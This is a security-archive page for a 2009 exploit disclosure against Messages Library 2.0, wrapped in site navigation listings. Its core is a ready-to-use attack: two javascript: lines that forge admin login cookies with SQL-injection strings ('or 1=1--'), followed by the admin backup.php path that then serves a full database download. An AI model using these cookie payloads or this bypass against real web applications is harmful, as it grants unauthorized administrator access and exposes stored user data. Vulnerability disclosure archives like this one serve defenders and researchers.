Messages Library 2.0 Insecure Cookie

Messages Library 2.0 Insecure Cookie: Posted Jul 1, 2009; Authored by Stack | Site v4-team.com; Messages Library version 2.0 suffers from an insecure cookie handling and database download vulnerability.; tags | exploit, insecure cookie handling; SHA-256 | 87ab475128f3b9adb1174c92c9edfe8c58acb45ea280799335474252a74957a6; Download | Favorite | View

Messages Library 2.0 Insecure Cookie

# Messages Library 2.0 <=  Arbitrary Database Download Vulnerability
########################################
#[*] Founded &  Exploited by : Stack
########################################
 
Bypass with
 
javascript:document.cookie = "SaphpLesson_Name=admin' or 1=1--; path=/";
javascript:document.cookie = "SaphpLesson_Password=' or 1=1--; path=/";
 
After Exec
 
http://localhost/sms/admin/backup.php
 
and you got the database download

Top Authors In Last 30 Days

Red Hat 294 files
Ubuntu 64 files
Debian 24 files
Apple 14 files
LiquidWorm 12 files
Gentoo 8 files
Google Security Research 4 files
Andrey Stoykov 3 files
Jann Horn 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,132)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,171)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,070)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,426)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,010)
UNIX (9,482)
UnixWare (188)
Windows (6,785)
Other

Messages Library 2.0 Insecure Cookie

Messages Library 2.0 Insecure Cookie

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Messages Library 2.0 Insecure Cookie

Share This

Messages Library 2.0 Insecure Cookie

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems